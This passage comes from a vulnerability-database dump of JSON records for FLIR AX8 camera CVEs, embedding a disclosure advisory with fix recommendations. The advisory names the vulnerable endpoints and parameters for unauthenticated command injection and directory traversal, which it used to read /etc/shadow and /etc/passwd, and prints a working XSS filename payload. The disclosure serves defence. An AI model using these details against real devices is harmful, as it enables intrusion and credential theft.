an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. \n\n###  Step by Step Example (How to Reproduce and verify) the vulnerabilities:\n\n1. Unauthenticated Remote Command Injection. \n\nThe endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file. \n\nThe server returns a JSON response containing the contents of the `/etc/shadow` file.  This command injection is due because there no sanitization check on the variable `$_POST[\"id\"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands. \n\n2. Unauthenticated Directory Traversal. \n\nThe endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file. \n\nThe error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight. \n\n3. Improper Access Control. \n\nThe endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database. \n\n4. Reflected cross-site scripting. \n\nIn the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call \n\n\u003cimg src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));\u003e.run\n\n\n### Recommendations for how to fix the 4 vulnerabilities:\n\n* Vulnerability 1: The variable `$_POST[\"id\"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. \n\nMore info: \nhttps://www.php.net/intval\nhttps://www.php.net/manual/en/function.escapeshellcmd\nhttps://www.php.net/manual/en/function.escapeshellarg\n\n\n* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions. \n\nMore info:\nhttps://www.php.net/manual/en/function.pathinfo\n\n* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`. \n\nMore info:\nhttps://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html\n\n* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters. \n\nMore info: \nhttps://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\n\n### Reference:\nhttps://www.flir.com/products/ax8-automation/\n\n### Security researchers:\n* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)\n* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi) \n\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-37062"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014924"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-37062",
            "trust": 3.3
          },
          {
            "db": "PACKETSTORM",
            "id": "168116",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014924",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2022080059",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3377",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014924"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37062"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3377"
          }
        ]
      },
      "id": "VAR-202208-1429",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2023-12-18T11:55:45.753000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-306",
            "trust": 1.0
          },
          {
            "problemtype": "Lack of authentication for critical features (CWE-306) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014924"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37062"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.flir.com/products/ax8-automation/"
          },
          {
            "trust": 2.4,
            "url": "https://gist.github.com/nwqda/9e16852ab7827dc62b8e44d6180a6899"
          },
          {
            "trust": 2.2,
            "url": "http://packetstormsecurity.com/files/168116/flir-ax8-1.46.16-traversal-access-control-command-injection-xss.html"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37062"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-37062/"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2022080059"
          },
          {
            "trust": 0.1,
            "url": "https://cheatsheetseries.owasp.org/cheatsheets/cross_site_scripting_prevention_cheat_sheet.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/intval"
          },
          {
            "trust": 0.1,
            "url": "https://www.linkedin.com/in/thomasjknudsen)"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.pathinfo"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.escapeshellcmd"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37060"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37061"
          },
          {
            "trust": 0.1,
            "url": "https://www.linkedin.com/in/samy-younsi)"
          },
          {
            "trust": 0.1,
            "url": "https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.escapeshellarg"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37063"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014924"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37062"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3377"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014924"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37062"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3377"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-09-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-014924"
          },
          {
            "date": "2022-08-19T19:24:22",
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "date": "2022-08-18T18:15:08.360000",
            "db": "NVD",
            "id": "CVE-2022-37062"
          },
          {
            "date": "2022-08-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-3377"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-09-22T08:25:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-014924"
          },
          {
            "date": "2022-10-26T17:01:56.470000",
            "db": "NVD",
            "id": "CVE-2022-37062"
          },
          {
            "date": "2022-08-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-3377"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3377"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FLIR\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0flir\u00a0ax8\u00a0 Vulnerability related to lack of authentication for critical functions in firmware",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014924"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "access control error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3377"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202208-1369

    Vulnerability from variot - Updated: 2023-12-18 11:55

    All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Cross Site Scripting (XSS) due to improper input sanitization. An authenticated remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. FLIR Systems, Inc. of flir ax8 Firmware has a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. # FLIR AX8 vulnerabilities.

    Product description:

    The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

    Summary of the 4 vulnerabilities found / What we were able to find:

    • [CVE-2022-37061] - Unauthenticated OS Command Injection.

    FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in res.php endpoint.

    • [CVE-2022-37060] - Unauthenticated Directory Traversal.

    FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path.

    • [CVE-2022-37062] - Improper Access Control.

    FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it.

    Step by Step Example (How to Reproduce and verify) the vulnerabilities:

    1. Unauthenticated Remote Command Injection.

    The endpoint /res.php can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate. The second problem is that the POST parameter id can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the /etc/shadow file.

    The server returns a JSON response containing the contents of the /etc/shadow file. This command injection is due because there no sanitization check on the variable $_POST["id"], line 65, and can therefore take advantage of the shell_exec() function to execute unexpected arbitrary shell commands.

    1. Unauthenticated Directory Traversal.

    The endpoint /download.php can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate. The second problem is that the GET parameter file can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the /etc/passwd file.

    The error is due to the fact that there is no sanitization of the $file_path variable, line 26, when the fopen() function is called, line 39. However a comment in the code, line 24, and the use of the function pathinfo(), line 28, suggests that the developer thought about this problem and therefore created the variable $path_parts which is sanitized. But for some reasons the developer does not use the sanitizer variable $path_parts when the function fopen() is used. Probably an oversight.

    1. Improper Access Control.

    The endpoint /FLIR/db/users.db can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID to check if the request is legitimate and let any malicious actor to download the users.db SQLite database.

    In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call

    .run

    Recommendations for how to fix the 4 vulnerabilities:

    • Vulnerability 1: The variable $_POST["id"], line 65 in the file /FLIR/usr/www/res.php, must be sanitized using the function intval() and will remove any character other than integer value. escapeshellcmd() and escapeshellarg() must be also used to escapes any characters in a string that might be used to execute arbitrary commands.

    More info: https://www.php.net/intval https://www.php.net/manual/en/function.escapeshellcmd https://www.php.net/manual/en/function.escapeshellarg

    • Vulnerability 2: The variable $file_path, line 39 in the file /FLIR/usr/www/download.php, must be sanitized using the function pathinfo() but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.

    More info: https://www.php.net/manual/en/function.pathinfo

    • Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in /etc/lighttpd.conf.

    More info: https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

    • Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.

    More info: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

    Reference:

    https://www.flir.com/products/ax8-automation/

    Security researchers:

    • [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)
    • [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202208-1369",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ax8",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "flir",
            "version": "1.46.16"
          },
          {
            "model": "ax8",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "ax8",
            "scope": null,
            "trust": 0.8,
            "vendor": "flir",
            "version": null
          },
          {
            "model": "ax8",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "flir",
            "version": "flir ax8  firmware  1.46.16  and earlier"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014923"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37063"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.46.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-37063"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Samy Younsi",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3376"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2022-37063",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.4,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.3,
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.4,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2022-37063",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "Low",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-37063",
                "trust": 1.8,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202208-3376",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014923"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37063"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3376"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Cross Site Scripting (XSS) due to improper input sanitization. An authenticated remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. FLIR Systems, Inc. of flir ax8 Firmware has a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. # FLIR AX8 vulnerabilities. \n\n### Product description:\n\nThe FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment. \n\n\n### Summary of the 4 vulnerabilities found / What we were able to find:\n\n* [CVE-2022-37061] - Unauthenticated OS Command Injection. \n\nFLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. \n\n* [CVE-2022-37060] - Unauthenticated Directory Traversal. \n\nFLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server\u0027s restricted path. \n\n* [CVE-2022-37062] - Improper Access Control. \n\nFLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it. \n\n###  Step by Step Example (How to Reproduce and verify) the vulnerabilities:\n\n1. Unauthenticated Remote Command Injection. \n\nThe endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file. \n\nThe server returns a JSON response containing the contents of the `/etc/shadow` file.  This command injection is due because there no sanitization check on the variable `$_POST[\"id\"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands. \n\n2. Unauthenticated Directory Traversal. \n\nThe endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file. \n\nThe error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight. \n\n3. Improper Access Control. \n\nThe endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database. \n\n4. \n\nIn the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call \n\n\u003cimg src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));\u003e.run\n\n\n### Recommendations for how to fix the 4 vulnerabilities:\n\n* Vulnerability 1: The variable `$_POST[\"id\"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. \n\nMore info: \nhttps://www.php.net/intval\nhttps://www.php.net/manual/en/function.escapeshellcmd\nhttps://www.php.net/manual/en/function.escapeshellarg\n\n\n* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions. \n\nMore info:\nhttps://www.php.net/manual/en/function.pathinfo\n\n* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`. \n\nMore info:\nhttps://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html\n\n* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters. \n\nMore info: \nhttps://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\n\n### Reference:\nhttps://www.flir.com/products/ax8-automation/\n\n### Security researchers:\n* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)\n* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi) \n\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-37063"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014923"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-37063",
            "trust": 3.3
          },
          {
            "db": "PACKETSTORM",
            "id": "168116",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014923",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2022080059",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3376",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014923"
          },
          {
            "db": "PACKETSTORM",
            "id": "168116"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37063"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-3376"
          }
        ]
      },
      "id": "VAR-202208-1369",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2023-12-18T11:55:45.706000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.0
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014923"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-37063"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.flir.com/products/ax8-automation/"
          },
          {
            "trust": 2.4,
            "url": "https://gist.github.com/nwqda/9e16852ab7827dc62b8e44d6180a6899"
          },
          {
            "trust": 2.2,
            "url": "http://packetstormsecurity.com/files/168116/flir-ax8-1.46.16-traversal-access-control-command-injection-xss.html"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37063"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-37063/"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2022080059"
          },
          {
            "trust": 0.1,
            "url": "https://cheatsheetseries.owasp.org/cheatsheets/cross_site_scripting_prevention_cheat_sheet.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/intval"
          },
          {
            "trust": 0.1,
            "url": "https://www.linkedin.com/in/thomasjknudsen)"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37062"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.pathinfo"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.escapeshellcmd"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37060"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-37061"
          },
          {
            "trust": 0.1,
            "url": "https://www.linkedin.com/in/samy-younsi)"
          },
          {
            "trust": 0.1,
            "url": "https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.php.net/manual/en/function.escapeshellarg"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-014923"
          },
          {
